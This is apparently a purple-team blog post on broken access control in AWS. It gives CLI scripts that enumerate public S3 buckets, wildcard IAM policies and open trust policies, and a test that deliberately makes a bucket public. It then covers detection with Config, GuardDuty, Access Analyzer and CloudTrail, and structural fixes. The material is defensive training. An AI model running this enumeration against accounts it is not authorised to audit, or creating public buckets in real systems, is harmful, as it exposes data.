  // Success feedback: show "Copied!" for two seconds, then restore the label.
  function ok(btn){btn.textContent='Copied!';btn.classList.add('copied');setTimeout(function(){btn.textContent='Copy';btn.classList.remove('copied');},2000);}
  // Fallback copy through an off-screen textarea and document.execCommand('copy').
  function fb(text,btn){
    try{var ta=document.createElement('textarea');ta.value=text;ta.style.cssText='position:fixed;left:-9999px;top:-9999px;opacity:0';document.body.appendChild(ta);ta.select();document.execCommand('copy');document.body.removeChild(ta);ok(btn);}
    catch(e){btn.textContent='✗ Failed';setTimeout(function(){btn.textContent='Copy';},2000);}
  }
  // Enhance right away if the DOM is already parsed, otherwise wait for DOMContentLoaded.
  if(document.readyState==='loading'){document.addEventListener('DOMContentLoaded',enhance);}else{enhance();}
})();
</script></p>
<p><a href="/what-is-purple-team-security/">What is purple team security</a> → <a href="/owasp-top-10-cloud-infrastructure/">OWASP Top 10 mapped to cloud infrastructure</a> → <a href="/cloud-security-breaches-2020-2025/">Cloud security breaches 2020–2025</a> → <strong>Broken access control in AWS</strong></p>
<hr />
<h2 id="tldr">TL;DR</h2>
<ul>
<li><strong>Broken access control in AWS</strong> is OWASP A01 — the most common cloud security failure, covering IAM wildcards, public S3 buckets, and overly broad trust policies</li>
<li>A public S3 bucket containing 47 million customer records was found during an authorized assessment after going undetected for six months — no GuardDuty finding, no AWS Config alert, because those controls weren&#8217;t configured to look for it</li>
<li>The red phase: three commands to identify public buckets, enumerate IAM over-permissions, and test trust policy abuse — all with read-only access on your own account</li>
<li>The blue phase: two AWS Config managed rules and one GuardDuty finding type that cover the majority of A01 findings</li>
<li>The purple phase: deny-based SCPs, bucket public access blocks, and IAM Access Analyzer — structural controls, not monitoring alerts</li>
<li>Cross-series: <a href="/aws-iam-privilege-escalation-passrole/">IAM privilege escalation paths</a> (IAM EP08) and <a href="/aws-least-privilege-audit/">AWS least privilege audit</a> (IAM EP09) go deeper on the IAM layer</li>
</ul>
<hr />
<blockquote>
<p><strong>OWASP Mapping:</strong> A01 Broken Access Control — primarily. A09 Logging and Monitoring Failures — the six-month detection gap demonstrates A09 as an amplifier of A01.</p>
</blockquote>
<hr />
<h2 id="the-big-picture">The Big Picture</h2>
<pre><code class="" data-line="">┌─────────────────────────────────────────────────────────────────────┐
│              BROKEN ACCESS CONTROL — ATTACK SURFACE                 │
│                                                                     │
│   INTERNET                    AWS ACCOUNT                           │
│                                                                     │
│   Attacker ──────────────&#x25b6;  S3 bucket (public read)                 │
│                             └── 47M customer records                │
│                                                                     │
│   Attacker ──────────────&#x25b6;  IAM user with &quot;Action&quot;: &quot;*&quot;             │
│   (compromised creds)        └── escalate → admin access            │
│                                                                     │
│   Attacker ──────────────&#x25b6;  Trust policy: &quot;AWS&quot;: &quot;*&quot;                │
│   (any AWS account)          └── assume role from attacker&#039;s        │
│                                  account                            │
│                                                                     │
│   ═══════════════════════════════════════════════════════           │
│                                                                     │
│   DETECTION GAPS (A09 amplifying A01):                              │
│   • S3 public access not in AWS Config rules                        │
│   • GuardDuty not enabled                                           │
│   • No IAM Access Analyzer                                          │
│   • No SCP boundary on public bucket creation                       │
│                                                                     │
└─────────────────────────────────────────────────────────────────────┘
</code></pre>
<p><strong>Broken access control in AWS</strong> is the infrastructure equivalent of OWASP A01: a principal can reach a resource it should not be able to reach, because the access control decision was either not made or made incorrectly. In the cloud context, this manifests as public S3 buckets, IAM policies with wildcard actions and resources, and trust policies that allow any principal rather than a specific, scoped entity.</p>
<hr />
<h2 id="the-assessment-that-changed-my-approach-to-access-control-auditing">The Assessment That Changed My Approach to Access Control Auditing</h2>
<p>During an authorized assessment, I found an S3 bucket containing 47 million customer records. The bucket name was generic — no obvious PII signal in the name itself. It was created two years prior by an engineer who was troubleshooting a data pipeline and needed temporary public access to share data with an external partner. The partner relationship ended. The bucket access was never reverted.</p>
<p>The bucket had been public for six months at the time I found it. I checked the AWS Config rules: S3 public access was not in the rule set. GuardDuty was enabled but no finding had fired — GuardDuty generates a <code class="" data-line="">Policy:S3/BucketAnonymousAccessGranted</code> finding when public access is enabled, but only if the finding is new during GuardDuty&#8217;s monitoring window. The bucket went public before GuardDuty was enabled.</p>
<p>No alert ever fired. Not because the tools couldn&#8217;t detect it — because the tools weren&#8217;t configured to look.</p>
<p>This is A01 amplified by A09. The broken access control is the public bucket. The six-month window is the logging and monitoring failure.</p>
<hr />
<h2 id="red-phase-how-broken-access-control-works-in-practice">Red Phase: How Broken Access Control Works in Practice</h2>
<p>The red team perspective on broken access control starts with enumeration. What can this principal reach that it shouldn&#8217;t be able to reach?</p>
<h3 id="enumerating-public-s3-buckets">Enumerating Public S3 Buckets</h3>
<pre><code class="" data-line=""># Account-level block: the same for every bucket, so read it once instead of per bucket
account_id=$(aws sts get-caller-identity --query Account --output text)
account_block=$(aws s3control get-public-access-block --account-id &quot;$account_id&quot; 2&gt;/dev/null | \
  jq -r &#039;.PublicAccessBlockConfiguration | [.BlockPublicAcls, .IgnorePublicAcls, .BlockPublicPolicy, .RestrictPublicBuckets] | all&#039;)
echo &quot;Account-level public access block fully enabled: ${account_block:-false}&quot;

aws s3api list-buckets --query &#039;Buckets[].Name&#039; --output text | \
  tr &#039;\t&#039; &#039;\n&#039; | \
  while read -r bucket; do
    # Check bucket-level policy
    policy=$(aws s3api get-bucket-policy-status --bucket &quot;$bucket&quot; 2&gt;/dev/null | \
      jq -r &#039;.PolicyStatus.IsPublic&#039;)

    # Check bucket ACL; join multiple grants (e.g. READ,WRITE) onto one line
    acl=$(aws s3api get-bucket-acl --bucket &quot;$bucket&quot; 2&gt;/dev/null | \
      jq -r &#039;[.Grants[] | select(.Grantee.URI == &quot;http://acs.amazonaws.com/groups/global/AllUsers&quot;) | .Permission] | join(&quot;,&quot;)&#039;)

    if [ &quot;$policy&quot; = &quot;true&quot; ] || [ -n &quot;$acl&quot; ]; then
      echo &quot;PUBLIC BUCKET: $bucket (policy_public=$policy, acl_grants=$acl)&quot;
    fi
  done
</code></pre>
<h3 id="enumerating-overly-permissive-iam-policies">Enumerating Overly Permissive IAM Policies</h3>
<pre><code class="" data-line=""># Find all customer-managed policies with wildcard actions
# Matches &quot;Action&quot;: &quot;*&quot; as well as &quot;Action&quot;: [&quot;*&quot;, ...]; Statement may be a single object or a list
wildcard_filter=&#039;.Statement | if type == &quot;array&quot; then .[] else . end
  | select(.Effect == &quot;Allow&quot; and ([.Action] | flatten | any(. == &quot;*&quot;)))&#039;

aws iam list-policies --scope Local --query &#039;Policies[].Arn&#039; --output text | \
  tr &#039;\t&#039; &#039;\n&#039; | \
  while read -r arn; do
    version=$(aws iam get-policy --policy-arn &quot;$arn&quot; \
      --query &#039;Policy.DefaultVersionId&#039; --output text)
    doc=$(aws iam get-policy-version --policy-arn &quot;$arn&quot; --version-id &quot;$version&quot; \
      --query &#039;PolicyVersion.Document&#039; --output json)

    # jq -e exits non-zero when the filter yields no statement
    if echo &quot;$doc&quot; | jq -e &quot;$wildcard_filter&quot; &gt; /dev/null 2&gt;&amp;1; then
      echo &quot;WILDCARD ACTION POLICY: $arn&quot;
      echo &quot;$doc&quot; | jq &quot;$wildcard_filter&quot;
    fi
  done
</code></pre>
<h3 id="testing-trust-policy-abuse">Testing Trust Policy Abuse</h3>
<pre><code class="" data-line=""># Find IAM roles with overly broad trust policies
# Specifically: trust policies that allow any AWS account or service
# The caller&#039;s account never changes, so look it up once rather than per role
current_account=$(aws sts get-caller-identity --query Account --output text)

aws iam list-roles --query &#039;Roles[].{Name:RoleName,Arn:Arn}&#039; --output json | \
  jq -r &#039;.[].Arn&#039; | \
  while read -r role_arn; do
    # get-role wants the bare role name: strip everything up to the last &quot;/&quot; (handles role paths)
    trust=$(aws iam get-role --role-name &quot;${role_arn##*/}&quot; \
      --query &#039;Role.AssumeRolePolicyDocument&#039; --output json 2&gt;/dev/null)

    # Check for wildcard principals: &quot;Principal&quot;: &quot;*&quot; and &quot;Principal&quot;: {&quot;AWS&quot;: &quot;*&quot;} (string or list)
    if echo &quot;$trust&quot; | jq -e &#039;.Statement[] | select(.Principal == &quot;*&quot; or ([.Principal | objects | .AWS] | flatten | any(. == &quot;*&quot;)))&#039; &gt; /dev/null 2&gt;&amp;1; then
      echo &quot;WILDCARD TRUST PRINCIPAL: $role_arn&quot;
    fi

    # Check for cross-account trust: report each distinct foreign account once,
    # whether the principal is a bare account ID, an account root, or a role/user ARN
    echo &quot;$trust&quot; | jq -r &#039;.Statement[] | [.Principal | objects | .AWS] | flatten | .[] | strings&#039; 2&gt;/dev/null | \
      sed -n -E &#039;s/^(arn:aws[a-z-]*:iam::)?([0-9]{12})(:.*)?$/\2/p&#039; | sort -u | \
      while read -r account_in_trust; do
        if [ &quot;$account_in_trust&quot; != &quot;$current_account&quot; ]; then
          echo &quot;CROSS-ACCOUNT TRUST (verify scope): $role_arn trusts account $account_in_trust&quot;
        fi
      done
  done
</code></pre>
<h3 id="simulating-s3-exfiltration-on-your-own-bucket-safe-test">Simulating S3 Exfiltration (on your own bucket — safe test)</h3>
<pre><code class="" data-line=""># Create a test bucket, make it public, verify it&#039;s accessible without credentials
# Do this in a non-production account only

# The epoch-seconds suffix gives each run its own bucket name
TEST_BUCKET=&quot;purple-team-test-$(date +%s)&quot;
aws s3 mb s3://${TEST_BUCKET} --region us-east-1

# Disable the public access block (simulates the misconfiguration)
aws s3api put-public-access-block \
  --bucket &quot;${TEST_BUCKET}&quot; \
  --public-access-block-configuration \
  &quot;BlockPublicAcls=false,IgnorePublicAcls=false,BlockPublicPolicy=false,RestrictPublicBuckets=false&quot;

# Add a public-read bucket policy
# The &#039;&quot;${TEST_BUCKET}&quot;&#039; splice closes the single-quoted JSON, inserts the shell variable, then reopens the quote
aws s3api put-bucket-policy --bucket &quot;${TEST_BUCKET}&quot; --policy &#039;{
  &quot;Version&quot;: &quot;2012-10-17&quot;,
  &quot;Statement&quot;: [{
    &quot;Effect&quot;: &quot;Allow&quot;,
    &quot;Principal&quot;: &quot;*&quot;,
    &quot;Action&quot;: &quot;s3:GetObject&quot;,
    &quot;Resource&quot;: &quot;arn:aws:s3:::&#039;&quot;${TEST_BUCKET}&quot;&#039;/*&quot;
  }]
}&#039;

# Put a test file
echo &quot;PURPLE_TEAM_TEST_DATA&quot; | aws s3 cp - s3://${TEST_BUCKET}/test.txt

# Verify it&#039;s accessible without credentials
curl -s &quot;https://${TEST_BUCKET}.s3.amazonaws.com/test.txt&quot;
# Should return: PURPLE_TEAM_TEST_DATA

# Nothing is deleted here: the bucket stays public until the printed cleanup command is run
echo &quot;&quot;
echo &quot;Test complete. Clean up:&quot;
echo &quot;aws s3 rb s3://${TEST_BUCKET} --force&quot;
</code></pre>
<hr />
<h2 id="blue-phase-what-detection-looks-like">Blue Phase: What Detection Looks Like</h2>
<h3 id="what-aws-config-catches">What AWS Config Catches</h3>
<p>Two managed rules cover the majority of S3 broken access control findings:</p>
<pre><code class="" data-line=""># Enable the S3 public access rules in AWS Config
# (requires Config to already be enabled)

# Rule 1: s3-bucket-public-read-prohibited
aws configservice put-config-rule --config-rule &#039;{
  &quot;ConfigRuleName&quot;: &quot;s3-bucket-public-read-prohibited&quot;,
  &quot;Source&quot;: {
    &quot;Owner&quot;: &quot;AWS&quot;,
    &quot;SourceIdentifier&quot;: &quot;S3_BUCKET_PUBLIC_READ_PROHIBITED&quot;
  },
  &quot;Scope&quot;: {
    &quot;ComplianceResourceTypes&quot;: [&quot;AWS::S3::Bucket&quot;]
  }
}&#039;

# Rule 2: s3-account-level-public-access-blocks-periodic
aws configservice put-config-rule --config-rule &#039;{
  &quot;ConfigRuleName&quot;: &quot;s3-account-level-public-access-blocks-periodic&quot;,
  &quot;Source&quot;: {
    &quot;Owner&quot;: &quot;AWS&quot;,
    &quot;SourceIdentifier&quot;: &quot;S3_ACCOUNT_LEVEL_PUBLIC_ACCESS_BLOCKS_PERIODIC&quot;
  }
}&#039;

# Check current compliance status of both rules created above
aws configservice describe-compliance-by-config-rule \
  --config-rule-names s3-bucket-public-read-prohibited s3-account-level-public-access-blocks-periodic \
  --query &#039;ComplianceByConfigRules[].{Rule:ConfigRuleName,Compliance:Compliance.ComplianceType}&#039;
</code></pre>
<h3 id="what-guardduty-catches">What GuardDuty Catches</h3>
<p>GuardDuty generates these findings for S3 broken access control:</p>
<table>
<thead>
<tr>
<th>Finding Type</th>
<th>Trigger</th>
<th>Severity</th>
</tr>
</thead>
<tbody>
<tr>
<td><code class="" data-line="">Policy:S3/BucketAnonymousAccessGranted</code></td>
<td>Bucket policy or ACL grants public read/write</td>
<td>High</td>
</tr>
<tr>
<td><code class="" data-line="">Policy:S3/BucketPublicAccessGranted</code></td>
<td>Bucket policy or ACL grants access to all authenticated AWS users</td>
<td>High</td>
</tr>
<tr>
<td><code class="" data-line="">Discovery:S3/MaliciousIPCaller</code></td>
<td>S3 discovery API (for example ListObjects or GetObjectAcl) called from a known malicious IP</td>
<td>High</td>
</tr>
</tbody>
</table>
<pre><code class="" data-line=""># Query GuardDuty findings for S3 public access violations
DETECTOR_ID=$(aws guardduty list-detectors --query &#039;DetectorIds[0]&#039; --output text)

# With no detector in this region the CLI prints the literal text &quot;None&quot;
if [ -z &quot;${DETECTOR_ID}&quot; ] || [ &quot;${DETECTOR_ID}&quot; = &quot;None&quot; ]; then
  echo &quot;GuardDuty is not enabled in this region&quot;
else
  FINDING_IDS=$(aws guardduty list-findings \
    --detector-id &quot;${DETECTOR_ID}&quot; \
    --finding-criteria &#039;{
      &quot;Criterion&quot;: {
        &quot;type&quot;: {
          &quot;Equals&quot;: [&quot;Policy:S3/BucketAnonymousAccessGranted&quot;, &quot;Policy:S3/BucketPublicAccessGranted&quot;]
        }
      }
    }&#039; \
    --query &#039;FindingIds&#039; --output text)

  # Only call get-findings when there is at least one ID to pass
  if [ -z &quot;${FINDING_IDS}&quot; ] || [ &quot;${FINDING_IDS}&quot; = &quot;None&quot; ]; then
    echo &quot;No S3 public access findings&quot;
  else
    echo &quot;${FINDING_IDS}&quot; | \
      xargs -n 10 aws guardduty get-findings \
        --detector-id &quot;${DETECTOR_ID}&quot; \
        --finding-ids | \
      jq &#039;.Findings[] | {type: .Type, bucket: .Resource.S3BucketDetails[0].Name, severity: .Severity}&#039;
  fi
fi
</code></pre>
<h3 id="what-iam-access-analyzer-catches">What IAM Access Analyzer Catches</h3>
<p>IAM Access Analyzer continuously analyzes resource policies for external access — S3 buckets, IAM roles, KMS keys, SQS queues, Lambda functions. It generates a finding any time a resource policy grants access to a principal outside the AWS account (or AWS Organization boundary).</p>
<pre><code class="" data-line=""># Enable IAM Access Analyzer for the account
aws accessanalyzer create-analyzer \
  --analyzer-name &quot;account-access-analyzer&quot; \
  --type ACCOUNT

# Look the analyzer up by name: the first entry of list-analyzers is not
# necessarily the analyzer created above if the account has more than one
ANALYZER_ARN=$(aws accessanalyzer get-analyzer \
  --analyzer-name &quot;account-access-analyzer&quot; \
  --query &#039;analyzer.arn&#039; --output text)

# List all active findings (external access granted)
aws accessanalyzer list-findings \
  --analyzer-arn &quot;${ANALYZER_ARN}&quot; \
  --filter &#039;{&quot;status&quot;: {&quot;eq&quot;: [&quot;ACTIVE&quot;]}}&#039; \
  --query &#039;findings[].{Resource:resource,Principal:principal,Action:action}&#039; \
  --output table
</code></pre>
<h3 id="what-the-cloudtrail-event-looks-like">What the CloudTrail Event Looks Like</h3>
<p>When an anonymous user accesses a public S3 object:</p>
<pre><code class="" data-line="">{
  &quot;eventVersion&quot;: &quot;1.09&quot;,
  &quot;userIdentity&quot;: {
    &quot;type&quot;: &quot;AWSAccount&quot;,
    &quot;accountId&quot;: &quot;ANONYMOUS_PRINCIPAL&quot;,  
    &quot;principalId&quot;: &quot;ANONYMOUS_PRINCIPAL&quot;
  },
  &quot;eventTime&quot;: &quot;2024-03-15T02:47:00Z&quot;,
  &quot;eventSource&quot;: &quot;s3.amazonaws.com&quot;,
  &quot;eventName&quot;: &quot;GetObject&quot;,
  &quot;requestParameters&quot;: {
    &quot;bucketName&quot;: &quot;your-bucket-name&quot;,
    &quot;key&quot;: &quot;customer-data/records.csv&quot;
  },
  &quot;sourceIPAddress&quot;: &quot;198.51.100.1&quot;,
  &quot;userAgent&quot;: &quot;python-requests/2.28.0&quot;
}
</code></pre>
<p>The signal: <code class="" data-line="">userIdentity.type = &quot;AWSAccount&quot;</code> with <code class="" data-line="">accountId = &quot;ANONYMOUS_PRINCIPAL&quot;</code> on a <code class="" data-line="">GetObject</code> event. This is a read from an anonymous, unauthenticated principal.</p>
<pre><code class="" data-line="">-- Athena query over CloudTrail logs: anonymous S3 GetObject events in the last 7 days
-- Assumes CloudTrail S3 data events are enabled for the bucket and that
-- cloudtrail_logs uses the standard CloudTrail table definition, where
-- eventTime and requestParameters are stored as strings

SELECT
  eventTime,
  sourceIPAddress,
  json_extract_scalar(requestParameters, &#039;$.bucketName&#039;) AS bucketName,
  json_extract_scalar(requestParameters, &#039;$.key&#039;) AS objectKey,
  userIdentity.type,
  userIdentity.accountId
FROM cloudtrail_logs
WHERE
  eventName = &#039;GetObject&#039;
  AND userIdentity.type = &#039;AWSAccount&#039;
  AND userIdentity.accountId = &#039;ANONYMOUS_PRINCIPAL&#039;
  AND from_iso8601_timestamp(eventTime) &gt; current_timestamp - interval &#039;7&#039; day
ORDER BY eventTime DESC
LIMIT 100;
</code></pre>
<hr />
<h2 id="purple-phase-the-structural-fix">Purple Phase: The Structural Fix</h2>
<p>Detection catches broken access control after the fact. The structural fix prevents it from being possible.</p>
<h3 id="fix-1-account-level-s3-public-access-block">Fix 1: Account-Level S3 Public Access Block</h3>
<p>This is a single setting that prevents any bucket in the account from becoming public — regardless of bucket policy or ACL. It overrides bucket-level settings.</p>
<pre><code class="" data-line=""># Turn on all four public access block settings for the whole account
ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)

aws s3control put-public-access-block \
  --account-id &quot;${ACCOUNT_ID}&quot; \
  --public-access-block-configuration \
  &quot;BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true&quot;

# Read the configuration back to confirm it took effect
aws s3control get-public-access-block --account-id &quot;${ACCOUNT_ID}&quot;
</code></pre>
<h3 id="fix-2-scp-to-prevent-disabling-the-public-access-block">Fix 2: SCP to Prevent Disabling the Public Access Block</h3>
<p>An SCP (Service Control Policy) at the AWS Organizations level that prevents any account from disabling the public access block — even an account administrator.</p>
<pre><code class="" data-line="">{
  &quot;Version&quot;: &quot;2012-10-17&quot;,
  &quot;Statement&quot;: [
    {
      &quot;Sid&quot;: &quot;DenyS3PublicAccessBlockDisable&quot;,
      &quot;Effect&quot;: &quot;Deny&quot;,
      &quot;Action&quot;: [
        &quot;s3:PutAccountPublicAccessBlock&quot;,
        &quot;s3:PutBucketPublicAccessBlock&quot;
      ],
      &quot;Resource&quot;: &quot;*&quot;,
      &quot;Condition&quot;: {
        &quot;ArnNotLike&quot;: {
          &quot;aws:PrincipalArn&quot;: &quot;arn:aws:iam::*:role/s3-public-access-exception-role&quot;
        }
      }
    }
  ]
}
</code></pre>
<pre><code class="" data-line=""># Create the SCP and keep its ID; creating a policy does not enforce it anywhere
POLICY_ID=$(aws organizations create-policy \
  --name &quot;DenyS3PublicAccessBlockDisable&quot; \
  --type SERVICE_CONTROL_POLICY \
  --content file://scp-deny-s3-public-access.json \
  --description &quot;Prevents disabling S3 public access block at account level&quot; \
  --query &#039;Policy.PolicySummary.Id&#039; --output text)

# Apply the SCP to your organizational unit (replace the target with your OU ID)
aws organizations attach-policy \
  --policy-id &quot;${POLICY_ID}&quot; \
  --target-id &quot;ou-xxxx-xxxxxxxx&quot;
</code></pre>
<h3 id="fix-3-iam-policy-cleanup-remove-wildcards">Fix 3: IAM Policy Cleanup — Remove Wildcards</h3>
<p>For IAM policies with wildcard actions, the fix is least-privilege replacement. This is not a quick operation — it requires analyzing actual usage and scoping to what is actually needed.</p>
<pre><code class="" data-line=""># Use IAM Access Analyzer policy generation to generate a least-privilege policy
# based on actual CloudTrail activity for a role
# The call returns a job ID; capture it so it can be passed straight to get-generated-policy
JOB_ID=$(aws accessanalyzer start-policy-generation \
  --policy-generation-details &#039;{
    &quot;principalArn&quot;: &quot;arn:aws:iam::123456789012:role/your-role-name&quot;
  }&#039; \
  --cloud-trail-details &#039;{
    &quot;accessRole&quot;: &quot;arn:aws:iam::123456789012:role/access-analyzer-cloudtrail-role&quot;,
    &quot;trailProperties&quot;: [{
      &quot;cloudTrailArn&quot;: &quot;arn:aws:cloudtrail:us-east-1:123456789012:trail/your-trail&quot;,
      &quot;regions&quot;: [&quot;us-east-1&quot;, &quot;us-west-2&quot;],
      &quot;allRegions&quot;: false
    }],
    &quot;startTime&quot;: &quot;2024-01-01T00:00:00Z&quot;,
    &quot;endTime&quot;: &quot;2024-03-01T00:00:00Z&quot;
  }&#039; \
  --query &#039;jobId&#039; --output text)

# Retrieve the generated policy
# Generation is asynchronous: re-run this until jobDetails.status reports SUCCEEDED
aws accessanalyzer get-generated-policy --job-id &quot;${JOB_ID}&quot;
</code></pre>
<p>For a systematic audit approach, the <a href="/aws-least-privilege-audit/">AWS least privilege audit</a> process in IAM EP09 covers how to move from wildcard policies to scoped permissions methodically across a multi-account environment.</p>
<h3 id="fix-4-iam-access-analyzer-with-automated-archiving">Fix 4: IAM Access Analyzer with Automated Archiving</h3>
<pre><code class="" data-line=""># Create an archive rule for known-good cross-account access
# (prevents alert fatigue from legitimate cross-account patterns)
# --analyzer-name must match the analyzer created earlier (&quot;account-access-analyzer&quot;);
# replace the example ARN in the filter with the principal you have documented as legitimate
aws accessanalyzer create-archive-rule \
  --analyzer-name &quot;account-access-analyzer&quot; \
  --rule-name &quot;archive-legitimate-cross-account&quot; \
  --filter &#039;{
    &quot;principal.AWS&quot;: {
      &quot;contains&quot;: [&quot;arn:aws:iam::111122223333:role/legitimate-cross-account-role&quot;]
    }
  }&#039;
</code></pre>
<hr />
<h2 id="run-this-in-your-own-environment-a01-audit">Run This in Your Own Environment: A01 Audit</h2>
<p>Run this in any AWS account you own or have read-only access to audit:</p>
<pre><code class="" data-line="">#!/bin/bash
# Purple Team EP04 — Broken Access Control (A01) Audit
# Safe to run with read-only IAM permissions

ACCOUNT=$(aws sts get-caller-identity --query Account --output text)
echo &quot;Auditing account: ${ACCOUNT}&quot;
echo &quot;===============================&quot;

echo &quot;&quot;
echo &quot;[A01-1] S3 Account-Level Public Access Block&quot;
# The call fails when no account-level configuration exists, which is itself the finding
aws s3control get-public-access-block --account-id &quot;${ACCOUNT}&quot; 2&gt;/dev/null || \
  echo &quot;  FINDING: Account-level public access block not configured&quot;

echo &quot;&quot;
echo &quot;[A01-2] S3 Buckets with Public Access&quot;
aws s3api list-buckets --query &#039;Buckets[].Name&#039; --output text | tr &#039;\t&#039; &#039;\n&#039; | \
  while read -r bucket; do
    # Buckets without a policy make the call fail; treat them as not public
    status=$(aws s3api get-bucket-policy-status --bucket &quot;$bucket&quot; 2&gt;/dev/null | \
      jq -r &#039;.PolicyStatus.IsPublic // &quot;false&quot;&#039;)
    if [ &quot;$status&quot; = &quot;true&quot; ]; then
      echo &quot;  FINDING: Public bucket: $bucket&quot;
    fi
  done

echo &quot;&quot;
echo &quot;[A01-3] IAM Roles with Wildcard Trust Policies&quot;
# list-roles already returns each role&#039;s trust policy, so every role is checked in one
# call (no per-role get-role, no 50-role cap). Matches both &quot;Principal&quot;: &quot;*&quot; and
# &quot;Principal&quot;: {&quot;AWS&quot;: &quot;*&quot;}. --output json keeps jq working whatever the CLI default is.
aws iam list-roles --output json 2&gt;/dev/null | jq -r &#039;
  .Roles[]
  | select(any([.AssumeRolePolicyDocument.Statement] | flatten | .[];
      .Effect == &quot;Allow&quot; and
      (.Principal == &quot;*&quot; or ([.Principal | objects | .AWS] | flatten | any(. == &quot;*&quot;)))))
  | &quot;  FINDING: Wildcard trust principal in role: \(.RoleName)&quot;&#039;

echo &quot;&quot;
echo &quot;[A01-4] IAM Access Analyzer — Active External Access Findings&quot;
ANALYZER=$(aws accessanalyzer list-analyzers --query &#039;analyzers[0].arn&#039; --output text 2&gt;/dev/null)
# With no analyzer the CLI prints the literal text &quot;None&quot;, not an empty string
if [ -z &quot;$ANALYZER&quot; ] || [ &quot;$ANALYZER&quot; = &quot;None&quot; ]; then
  echo &quot;  FINDING: IAM Access Analyzer not enabled&quot;
else
  aws accessanalyzer list-findings \
    --analyzer-arn &quot;${ANALYZER}&quot; \
    --filter &#039;{&quot;status&quot;: {&quot;eq&quot;: [&quot;ACTIVE&quot;]}}&#039; \
    --query &#039;findings[].{Resource:resource,Type:resourceType}&#039; \
    --output table
fi
</code></pre>
<hr />
<h2 id="common-mistakes-when-fixing-broken-access-control-in-aws"><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/26a0.png" alt="⚠" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Common Mistakes When Fixing Broken Access Control in AWS</h2>
<p><strong>Fixing the symptom at the bucket level without the account-level block.</strong> If you set <code class="" data-line="">RestrictPublicBuckets=true</code> on individual buckets but leave the account-level block unset, the next bucket created by another engineer starts with public access possible again. The account-level block is the structural control; the bucket-level setting is defense-in-depth.</p>
<p><strong>Not enabling CloudTrail S3 data events.</strong> CloudTrail management events capture bucket creation and policy changes. They do not capture <code class="" data-line="">GetObject</code> and <code class="" data-line="">PutObject</code> by default — that requires enabling S3 data events, which adds cost. Without data events, you cannot see who accessed what in a public bucket. If you can&#8217;t afford data events on all buckets, enable them on buckets containing sensitive data.</p>
<p><strong>Treating IAM Access Analyzer findings as one-time.</strong> Access Analyzer runs continuously. A new resource policy that grants external access generates a new finding. If you archive findings without fixing the underlying policy, you lose visibility. Archive only findings that represent intentional, documented cross-account access.</p>
<p><strong>Confusing &#8220;no GuardDuty findings&#8221; with &#8220;no problem.&#8221;</strong> GuardDuty&#8217;s <code class="" data-line="">Policy:S3/BucketAnonymousAccessGranted</code> only fires when access is newly granted during GuardDuty&#8217;s monitoring window. A bucket that was made public before GuardDuty was enabled will not generate a finding — GuardDuty does not retroactively scan all bucket policies. Use AWS Config for retroactive compliance checks; use GuardDuty for real-time detection of new violations.</p>
<p>For the full IAM attack chain that broken access control enables — including <a href="/aws-iam-privilege-escalation-passrole/">IAM privilege escalation paths via iam:PassRole</a> — see IAM series EP08. The privilege escalation analysis belongs alongside the access control audit.</p>
<hr />
<h2 id="quick-reference">Quick Reference</h2>
<table>
<thead>
<tr>
<th>Control</th>
<th>What It Does</th>
<th>AWS Service</th>
</tr>
</thead>
<tbody>
<tr>
<td>Account-level S3 public access block</td>
<td>Prevents any bucket from becoming public</td>
<td>S3 Control</td>
</tr>
<tr>
<td>SCP: deny public access block disable</td>
<td>Prevents disabling the account-level block</td>
<td>Organizations</td>
</tr>
<tr>
<td>AWS Config: <code class="" data-line="">S3_BUCKET_PUBLIC_READ_PROHIBITED</code></td>
<td>Flags buckets that are or become public</td>
<td>AWS Config</td>
</tr>
<tr>
<td>GuardDuty: <code class="" data-line="">Policy:S3/BucketAnonymousAccessGranted</code></td>
<td>Detects new public access grants</td>
<td>GuardDuty</td>
</tr>
<tr>
<td>IAM Access Analyzer</td>
<td>Finds all resources with external access grants</td>
<td>Access Analyzer</td>
</tr>
<tr>
<td>CloudTrail S3 data events</td>
<td>Captures GetObject/PutObject for audit</td>
<td>CloudTrail</td>
</tr>
<tr>
<td>IAM policy generation</td>
<td>Generates least-privilege policy from actual usage</td>
<td>Access Analyzer</td>
</tr>
</tbody>
</table>
<hr />
<h2 id="key-takeaways">Key Takeaways</h2>
<ul>
<li><strong>Broken access control in AWS</strong> (OWASP A01) is the most common cloud security failure — IAM wildcards, public S3, and broad trust policies are the three primary manifestations</li>
<li>A public S3 bucket with 47 million records was active for six months without a single alert — because the detection controls (AWS Config rules, GuardDuty) weren&#8217;t enabled to look for it</li>
<li>The structural fix is the account-level S3 public access block enforced by SCP — detection tools catch violations; the SCP prevents the violation from being possible</li>
<li>IAM Access Analyzer provides continuous visibility into every resource that grants external access — enable it in every account</li>
<li>The red phase can be run with read-only permissions against your own account — the audit script above reveals your current A01 exposure in under five minutes</li>
<li>Fixing A01 without enabling the A09 controls (CloudTrail data events, GuardDuty, AWS Config) leaves you blind to whether the fix is working</li>
<li>Use Access Analyzer&#8217;s policy generation feature to move from wildcard policies to least-privilege without guessing</li>
</ul>
<hr />
<h2 id="whats-next">What&#8217;s Next</h2>
<p>EP05 covers MFA fatigue attacks — how the Uber and Okta breaches worked at the authentication layer, how to simulate push-notification fatigue in a test environment, and the structural fix: phishing-resistant MFA using FIDO2 hardware keys. The identity layer is where most cloud compromises start — understanding how push MFA fails is the prerequisite for knowing why hardware keys are the only structural answer.</p>
<p>Get EP05 in your inbox when it publishes → <a href="https://linuxcent.com/subscribe">subscribe at linuxcent.com</a></p>
